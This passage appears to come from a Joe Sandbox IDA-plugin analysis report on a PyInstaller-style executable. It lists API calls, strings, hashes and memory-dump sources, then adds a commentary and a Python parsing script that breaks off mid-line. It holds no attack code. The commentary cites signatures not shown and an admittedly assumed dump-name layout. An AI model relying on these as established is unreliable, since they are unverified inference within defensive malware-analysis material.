                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                        • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction ID: c563875ac9a13bcc3fe2b64dffd0a963335b08f6d3aa18ddfb04f5baaed12451
                                                                                                                        • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction Fuzzy Hash: AA31F021A0AA4291EE15AF06A8105B4EBD4FF58FB0FD94634DD1D4A388EF3DF4498720
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7C5BD7A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7A6A
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7C5BD67CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7C5BD64DF
                                                                                                                          • Part of subcall function 00007FF7C5BD2770: MessageBoxW.USER32 ref: 00007FF7C5BD2841
                                                                                                                        Strings
                                                                                                                        • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7C5BD64B6
                                                                                                                        • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7C5BD653A
                                                                                                                        • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7C5BD64F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                        • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                        • API String ID: 1662231829-3498232454
                                                                                                                        • Opcode ID: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                                                                                        • Instruction ID: 523b7543eee4f4e76f9acc64cd21b434eba524f5daeb370ab24bc8817fb6d09b
                                                                                                                        • Opcode Fuzzy Hash: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                                                                                        • Instruction Fuzzy Hash: 0531A315B1CB8380FA64BF21A5553BADA51AF98FE4FC40031DA0E427DEEE2EE5048720
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7A6A
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7AF0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 3723044601-876015163
                                                                                                                        • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction ID: 4a57df5e8d2a3bc089ecdbe23bd923a13ba6e44a2533a8d05d19e07d516b3b32
                                                                                                                        • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction Fuzzy Hash: FD218726B0CA4241EB10EF19F400169EB61FF94BE4F984631DB4C83B69EF2EE5418710
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA62F
• FlsGetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA644
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA665
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA692
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA6A3
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA6B4
• SetLastError.KERNEL32(?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F,?,?,?,00007FF7C5BE9313), ref: 00007FF7C5BEA6CF
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
• Instruction ID: 98af36a7b9db39c238edf34f90c34e35a92c5ef00d3ef53918dfe676c41b7080
• Opcode Fuzzy Hash: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
• Instruction Fuzzy Hash: 0D216221E0C60346F9687F215A59179EA459F87FB0F984734E93E0B6D6DEAEB4404331
APIs
Strings
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
• Instruction ID: e47abca775b4c8961f52b902be5fbd9b3e93f3236f2469dfb3cb9f3636fde9c6
• Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
• Instruction Fuzzy Hash: 9911D326B18A4286E350AF56E854329F7A0FB88FF4F940334EA1D87794CF7DD5048710
APIs
• GetLastError.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA7A7
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA7DD
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA80A
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA81B
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA82C
• SetLastError.KERNEL32(?,?,?,00007FF7C5BE444D,?,?,?,?,00007FF7C5BEDDA7,?,?,00000000,00007FF7C5BEA8B6,?,?,?), ref: 00007FF7C5BEA847
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
• Instruction ID: 1c55387286418c22b073684a9003751397b9cf223fa5cb2bebbd8aae0c78a055
• Opcode Fuzzy Hash: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
• Instruction Fuzzy Hash: 21119320E0C64242F568BF315945079DA5A9F85FB0FD84334E92E076C6DEAEF8418331
APIs
Strings
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
• Instruction ID: 59e2ccacd38ee49648641e2ed76c46cfddafa89e7f2c47b2f4e2ce5022cfee58
• Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
• Instruction Fuzzy Hash: 5B51D132B196028ADB15EF15E400A29BB95FB64FA8F958130DA4E4778CDF3EF941C714
APIs
Strings
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
• Instruction ID: 455f6f1fd9992619877635c9b5cf55afe3d391eb5a007edefaea4d181e37c467
• Opcode Fuzzy Hash: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
• Instruction Fuzzy Hash: A2316F36A08A8289EB24EF61E8551F9E760FF88BA4F840135EE4D4BB5ADF3DD145C710
APIs
• GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
  • Part of subcall function 00007FF7C5BD74B0: GetLastError.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD74D7
  • Part of subcall function 00007FF7C5BD74B0: FormatMessageW.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD7506
  • Part of subcall function 00007FF7C5BD7A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7A6A
• MessageBoxW.USER32 ref: 00007FF7C5BD272C
• MessageBoxA.USER32 ref: 00007FF7C5BD2748
Strings
Similarity
• API ID: Message$ErrorLast$ByteCharFormatMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 2806210788-2410924014
• Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
• Instruction ID: b0cabf06d3d484c5dffae582c90e1f9587bdc9e619bcd0818e5a2fd2fda1b071
• Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
• Instruction Fuzzy Hash: 62317272628A8281E634AF10E4517EAE764FF84B94FC04136E68D07A9DDF3DD305CB50
APIs
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
• Instruction ID: 1cbdb009b0698f0c680fe1002522ae9f64ede61d89249732912b3ea4d7f1fa0b
• Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
• Instruction Fuzzy Hash: B1F06269A19B0281EB24AF24E855739DB20EF85FB1FD81735D66E456F4CF2ED049C320
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _set_statfp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1156100317-0
                                                                                                                        • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                        • Instruction ID: 15b3da62ab77159bdaffd5b7aacec11f6877bec6387d04cbcbb517dfd8ac5064
                                                                                                                        • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                        • Instruction Fuzzy Hash: 1511916AE18A0715F7943D28F446375AC416F58BB4F940734F96F1AAD6CF2EEC414270
                                                                                                                        APIs
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA87F
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA89E
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA8C6
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA8D7
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E,?,?,?,?,?,00007FF7C5BE21EC), ref: 00007FF7C5BEA8E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                                                                                        • Instruction ID: 8525f3656c834147d5f6f437215a10e8a94c22a083d7543a5fa9cef1c1a0c955
                                                                                                                        • Opcode Fuzzy Hash: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                                                                                        • Instruction Fuzzy Hash: DF117F20E0C64202FA58BF265995179DA499F85FB0F9C4334F93E0A6C6DEAEB4428631
                                                                                                                        APIs
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA705
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA724
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA74C
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA75D
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7C5BF2433,?,?,?,00007FF7C5BECB8C,?,?,00000000,00007FF7C5BE3A5F), ref: 00007FF7C5BEA76E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction ID: ef5889f8795e280fada2348395aa94ce0ac2b357d9fbf81b07bf6afdee4cd736
                                                                                                                        • Opcode Fuzzy Hash: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction Fuzzy Hash: E8110024E0C20342F969BF3148561799A9A8F86F70FDC4734E93E0A2D2DDAEB4414271
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                        • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction ID: 7aaa28f79303f533d425e6b59b8aef678dd719b862a28fbd25c19b427d7eac9b
                                                                                                                        • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction Fuzzy Hash: 83819276E0C24385F764BF258150278BFA0AB11F68FDD8035DA0E972D5DBAFE9019721
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                        • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction ID: 8fd0a4180529a79987f67a00f98b232d572ca675ef4f1daff232de7ff70e12fe
                                                                                                                        • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction Fuzzy Hash: 45615A37A08B458AE710AF65D4803ADBBA0FB44BA8F544225EF4D17B98CF79E155C710
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                        • String ID: csm$csm
                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                        • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction ID: 861cec2efb88b440bb299a2ce92da199c0b163cd76fdcbb7f3fa895fc930fbbe
                                                                                                                        • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction Fuzzy Hash: 62519E3290864286EB74AF159544278BFA0EB54FA8F984135FA8C47BDDDF3EE451CB20
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                        • API String ID: 1878133881-2410924014
                                                                                                                        • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction ID: 40f2f830d6cb25586ab0c568485a885e622365b407f1801c8a2a132c5062b760
                                                                                                                        • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction Fuzzy Hash: 30317E72628A8281E624BF51E4517EAE765FF84F98FC04136EA8D07A89DF3DD305CB50
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD3BD1
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        Strings
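The "APIs" bullets in these function entries (call name, module, argument snapshot, and a "ref:" call-site address) and the "Memory Dump Source" lines (the .sdmp regions of PID 12 the IDA plugin analysed) are the parts of this report a triager most often has to cross-reference: the entry above, whose strings "Failed to get executable path." and "Failed to convert executable path to UTF-8." sit next to GetModuleFileNameW and MessageBoxW, is consistent with the PyInstaller bootloader the report's signatures already flag. The Python below is an added illustration, not Joe Sandbox code or part of the report. It parses both line shapes, decodes the protection and type fields of each dumped region, and maps every call site to the region containing it and to its RVA from the image base. The field layout assumed for the .sdmp name (pid.step.counter.base.protect.state.type.seq) is inferred from the names on this page and agrees with the snapshot file name hcaresult_12_2_7ff7c5bd0000 (PID 12, base 0x7FF7C5BD0000) but is otherwise an assumption; region sizes are not given, so a call site is assigned to the highest region base at or below it. The sample text is assembled from lines on this page (two entries merged).

```python
"""Parse 'APIs' and 'Memory Dump Source' lines of a Joe Sandbox IDA-plugin
function entry and map each call site to the dumped region that contains it.
Added example for this page; not Joe Sandbox code."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constants from <winnt.h>; the report encodes them as hex fields in .sdmp names.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout of the dump file name: <pid>.<step>.<counter>.<base>.<protect>.<state>.<type>.<seq>.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<step>[0-9A-Fa-f]{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.(?P<mtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
OFFSET_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]{16})")
# One 'APIs' bullet: optional subcall prefix, Func.MODULE, optional (args), ref: <call site>
API_RE = re.compile(
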